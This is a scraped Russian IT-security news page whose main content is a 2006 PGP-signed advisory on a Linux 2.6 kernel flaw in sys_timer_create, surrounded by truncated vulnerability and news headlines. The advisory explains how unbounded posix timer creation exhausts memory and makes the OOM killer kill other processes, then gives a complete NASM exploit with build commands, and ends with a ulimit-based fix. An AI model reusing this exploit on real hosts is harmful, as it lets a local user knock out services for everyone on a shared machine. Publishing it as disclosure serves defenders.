РУС |
ENG
SQL injection vulnerability in index.php in Kayako eSupport 3.70.02 allows remote attackers to execu ...
SQL injection vulnerability in index.php in Kayako eSupport 3.70.02 allows remote attackers to execu ...
SQL injection vulnerability in the Ozio Gallery (com_oziogallery) component for Joomla! allo ...
SQL injection vulnerability in ttvideo.php in the TTVideo (com_ttvideo) component 1.0 for Jo ...
Троянская программа, которая без ведома пользователя скачивает на компьютер другое программное обесп ...
Троянская программа, которая скачивает и устанавливает другие вредоносные программы на компьютер без ...
Программа-эксплоит, использующая для своего выполнения на компьютере пользователя уязвимость в Java ...
dumprep.exe – файл, являющийся частью операционной системы Microsoft Windows XP и более поздних верс ...
Программа отвечает за обработку COM+ процессов в Internet Information Services (IIS) и других програ ...
Cthelper.exe – драйвера для Creative SoundBlaster.
11 апреля, 2006
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hello.
I'd like to present one of Linux Kernel vulnerabilities. As far as I
know, this one affects 2.6.x kernels.
Problem
- --
The problem lies in sys_timer_create() in Linux/kernel/posix-timers.c.
Each time user creates a posix timer, some kernel memory is allocated.
Since count of timers that can be created by user is limited only by
sigqueue size (ex. 4294967295 in Debian) every local user can exhaust
all avaible memory which will trigger oom_killer (mm/oom_kill.c). If a
process itself uses a small amount of memory, it's oom_score will be
low, so all other processes would be killed.
Exploit
- --
- --------------8<---------------------
;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o
section .text
global _start
count equ 8 ; threads count - do it quicker
_start:
mov ebx, count
call create_threads
jmp done
_pause:
mov eax,29
int 0x80
ret
create_threads:
mov eax,2
int 0x80
test eax,eax
jz consume
dec ebx
test ebx,ebx
jnz create_threads
ret
consume:
setsid: ; so we won't get counted as one thread in oom_killer()
xor ebx,ebx ; each task will have about 20 oom_score which
mov eax,66 ; is less than 'init' and others
int 0x80
push eax
loopek:
mov eax,259
mov ebx,0
mov ecx,0
mov edx,esp
int 0x80
jmp loopek
done:
xor ebx,ebx
mov eax,1
int 0x80
- --------------8<--------------------
Fix
- --
In my opinion the easiest way to defend is to enforce pending signals
queue size rlimit (ulimit -i).
Vendor notification status
- --
Vendor refused to fix this kind of bugs.
- --
Regards,
fingerout
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)
iD8DBQFEMwAY3AGvlpYpo4cRApESAJ9PPyZaHz5HExrh15pQdH51I3di+wCfee87
hqrfQZpKiyqugdZoabAHy9g=
=9y9Y
-----END PGP SIGNATURE-----
Уязвимости:
Специалисты кафедры информационных технологий Нижегородского института развития образования (НИР ...
Центральный районный суд Комсомольска-на-Амуре решил перенять опыт китайских коллег и обязал местног ...
Известный православный священник Александр Шумский призывает государство прекратить беспредел в Сети ...
Священнослужителям следует заходить в социальные сети только для того, чтобы нести слово Божие, заяв ...
Сегодня компания Blizzard официально выпустила в продажу вторую версию легендарной стратегии Starcra ...
Популярная CMS Wordpress, распространяемая под лицензией GPL оказалась в центре скандала. Система уп ...
Российские власти озвучили план создания национальной операционной системы на базе существующей ОС L ...
Информация о группе из шести человек, которые могут перезагрузить мировой Интернет, не соответствует ...
Росохранкультура завершила прием заявок на сбор авторских отчислений с производителей и импортеров а ...
Рекордные результаты квартала, объявленные корпорацией Microsoft в четверг, не позволили Apple обой ...
Теодор Тсо, один из ключевых разработчиков Linux-ядра, высказал мнение, что пользователям операционн ...
Американские ученые подсчитали, что при нынешних темпах роста Сети оставшихся незанятыми IP-адресов ...